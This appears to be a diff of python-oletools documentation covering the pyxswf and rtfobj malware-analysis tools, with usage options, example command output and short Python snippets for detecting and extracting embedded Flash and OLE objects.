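# whether normally or through an exception
with closing(parser) as vba:
    found = vba.detect_vba_macros()

print(parser.closed)
```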
+python-oletools documentation
+Contribute, Suggest Improvements or Report Issues
Tools:
+pyxswf is a script to detect, extract and analyze Flash objects (SWF files) that may be embedded in files such as MS Office documents (e.g. Word, Excel), which is especially useful for malware analysis.
-It is part of the python-oletools package.
-pyxswf is an extension to xxxswf.py published by Alexander Hanel.
-Compared to xxxswf, it can extract streams from MS Office documents by parsing their OLE structure properly, which is necessary when streams are fragmented. Stream fragmentation is a known obfuscation technique, as explained on http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/
-It can also extract Flash objects from RTF documents, by parsing embedded objects encoded in hexadecimal format (-f option).
-For this, simply add the -o option to work on OLE streams rather than raw files, or the -f option to work on RTF files.
-Usage: pyxswf.py [options] <file.bad>
-
-Options:
- -o, --ole Parse an OLE file (e.g. Word, Excel) to look for SWF
- in each stream
- -f, --rtf Parse an RTF file to look for SWF in each embedded
- object
- -x, --extract Extracts the embedded SWF(s), names it MD5HASH.swf &
- saves it in the working dir. No addition args needed
- -h, --help show this help message and exit
- -y, --yara Scans the SWF(s) with yara. If the SWF(s) is
- compressed it will be deflated. No addition args
- needed
- -s, --md5scan Scans the SWF(s) for MD5 signatures. Please see func
- checkMD5 to define hashes. No addition args needed
- -H, --header Displays the SWFs file header. No addition args needed
- -d, --decompress Deflates compressed SWFS(s)
- -r PATH, --recdir=PATH
- Will recursively scan a directory for files that
- contain SWFs. Must provide path in quotes
- -c, --compress Compresses the SWF using Zlib
-C:\oletools>pyxswf.py -o word_flash.doc
-OLE stream: 'Contents'
-[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
- [ADDR] SWF 1 at 0x8 - FWS Header
-
-C:\oletools>pyxswf.py -xo word_flash.doc
-OLE stream: 'Contents'
-[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
- [ADDR] SWF 1 at 0x8 - FWS Header
- [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf
-C:\oletools>pyxswf.py -xf "rtf_flash.rtf"
-RTF embedded object size 1498557 at index 000036DD
-[SUMMARY] 1 SWF(s) in MD5:46a110548007e04f4043785ac4184558:RTF_embedded_object_0
-00036DD
- [ADDR] SWF 1 at 0xc40 - FWS Header
- [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf
-TODO
-pyxswf
+======
+pyxswf is a script to detect, extract and analyze Flash objects (SWF files) that may
+be embedded in files such as MS Office documents (e.g. Word, Excel),
+which is especially useful for malware analysis.
+It is part of the python-oletools package.
+pyxswf is an extension to xxxswf.py published by Alexander Hanel.
+Compared to xxxswf, it can extract streams from MS Office documents by parsing
+their OLE structure properly, which is necessary when streams are fragmented.
+Stream fragmentation is a known obfuscation technique, as explained on
+http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/
+It can also extract Flash objects from RTF documents, by parsing embedded objects encoded in hexadecimal format (-f option).
+For this, simply add the -o option to work on OLE streams rather than raw files, or the -f option to work on RTF files.
+Usage: pyxswf.py [options] <file.bad>
+
+Options:
+ -o, --ole Parse an OLE file (e.g. Word, Excel) to look for SWF
+ in each stream
+ -f, --rtf Parse an RTF file to look for SWF in each embedded
+ object
+ -x, --extract Extracts the embedded SWF(s), names it MD5HASH.swf &
+ saves it in the working dir. No addition args needed
+ -h, --help show this help message and exit
+ -y, --yara Scans the SWF(s) with yara. If the SWF(s) is
+ compressed it will be deflated. No addition args
+ needed
+ -s, --md5scan Scans the SWF(s) for MD5 signatures. Please see func
+ checkMD5 to define hashes. No addition args needed
+ -H, --header Displays the SWFs file header. No addition args needed
+ -d, --decompress Deflates compressed SWFS(s)
+ -r PATH, --recdir=PATH
+ Will recursively scan a directory for files that
+ contain SWFs. Must provide path in quotes
+ -c, --compress Compresses the SWF using Zlib
+C:\oletools>pyxswf.py -o word_flash.doc
+OLE stream: 'Contents'
+[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
+ [ADDR] SWF 1 at 0x8 - FWS Header
+
+C:\oletools>pyxswf.py -xo word_flash.doc
+OLE stream: 'Contents'
+[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
+ [ADDR] SWF 1 at 0x8 - FWS Header
+ [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf
+C:\oletools>pyxswf.py -xf "rtf_flash.rtf"
+RTF embedded object size 1498557 at index 000036DD
+[SUMMARY] 1 SWF(s) in MD5:46a110548007e04f4043785ac4184558:RTF_embedded_object_000036DD
+ [ADDR] SWF 1 at 0xc40 - FWS Header
+ [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf
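The `[ADDR]` lines above report the offset at which an SWF header was found. As a rough illustration of that idea only (this is not pyxswf's or xxxswf's actual code), the sketch below scans a byte buffer for the `FWS` (uncompressed) and `CWS` (zlib-compressed) signatures. The helper name `find_swf_headers` and the sample buffer are hypothetical.

```python
# Hypothetical helper, not part of pyxswf: locate candidate SWF headers
# by searching for the 3-byte signatures at any offset in a buffer.
SWF_SIGNATURES = (b"FWS", b"CWS")  # uncompressed and zlib-compressed SWF


def find_swf_headers(data):
    """Return a sorted list of (offset, signature) for each candidate header."""
    hits = []
    for sig in SWF_SIGNATURES:
        start = data.find(sig)
        while start != -1:
            hits.append((start, sig.decode("ascii")))
            start = data.find(sig, start + 1)
    return sorted(hits)


# Made-up buffer: 8 padding bytes, then an "FWS" signature and a version byte.
sample = b"\x00" * 8 + b"FWS\x09" + b"\x00" * 16
for offset, sig in find_swf_headers(sample):
    print("SWF candidate at 0x%x - %s header" % (offset, sig))
```

A signature match alone is only a candidate: a real scanner would also need to validate the rest of the header before treating the hit as an SWF file.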
+TODO
+python-oletools documentation
+Contribute, Suggest Improvements or Report Issues
Tools:
+rtfobj is a Python module to extract embedded objects from RTF files, such as OLE objects. It can be used as a Python library or a command-line tool.
-It is part of the python-oletools package.
-rtfobj.py <file.rtf>
-It extracts and decodes all the data blocks encoded as hexadecimal in the RTF document, and saves them as files named "object_xxxx.bin", xxxx being the location of the object in the RTF file.
-Usage as a python module:
-rtf_iter_objects(filename) is an iterator which yields a tuple (index, object) providing the index of each hexadecimal stream in the RTF file, and the corresponding decoded object.
-Example:
-import rtfobj
-for index, data in rtfobj.rtf_iter_objects("myfile.rtf"):
- print 'found object size %d at index %08X' % (len(data), index)
-rtfobj
+======
+rtfobj is a Python module to extract embedded objects from RTF files, such as
+OLE objects. It can be used as a Python library or a command-line tool.
+It is part of the python-oletools package.
+rtfobj.py <file.rtf>
+It extracts and decodes all the data blocks encoded as hexadecimal in the RTF document, and saves them as files named "object_xxxx.bin", xxxx being the location of the object in the RTF file.
+Usage as a python module:
+rtf_iter_objects(filename) is an iterator which yields a tuple (index, object) providing the index of each hexadecimal stream in the RTF file, and the corresponding decoded object.
+Example:
+import rtfobj
+for index, data in rtfobj.rtf_iter_objects("myfile.rtf"):
+    print('found object size %d at index %08X' % (len(data), index))
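To make the "data blocks encoded as hexadecimal" idea concrete, here is a minimal, self-contained sketch. It is not rtfobj's implementation: it only matches contiguous runs of hex digits, the 32-digit minimum is an arbitrary assumption, and the name `iter_hex_blocks` is hypothetical. It yields `(index, decoded_bytes)` pairs in the same spirit as `rtf_iter_objects`.

```python
import binascii
import re

# Hypothetical simplification, not rtfobj's implementation: match only
# contiguous runs of at least 16 hex pairs (the threshold is arbitrary).
HEX_RUN = re.compile(rb"(?:[0-9A-Fa-f]{2}){16,}")


def iter_hex_blocks(rtf_bytes):
    """Yield (index, decoded_bytes) for each long hexadecimal run."""
    for match in HEX_RUN.finditer(rtf_bytes):
        yield match.start(), binascii.unhexlify(match.group(0))


# Made-up RTF fragment whose object data is 32 bytes encoded as 64 hex digits.
sample = b"{\\rtf1 {\\object\\objdata " + b"d0cf11e0a1b11ae1" * 4 + b"}}"
for index, data in iter_hex_blocks(sample):
    print("found object size %d at index %08X" % (len(data), index))
```

Real RTF files may break hex data across lines or interleave other characters, so a robust extractor needs more tolerant parsing than this single regular expression.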
+python-oletools documentation
+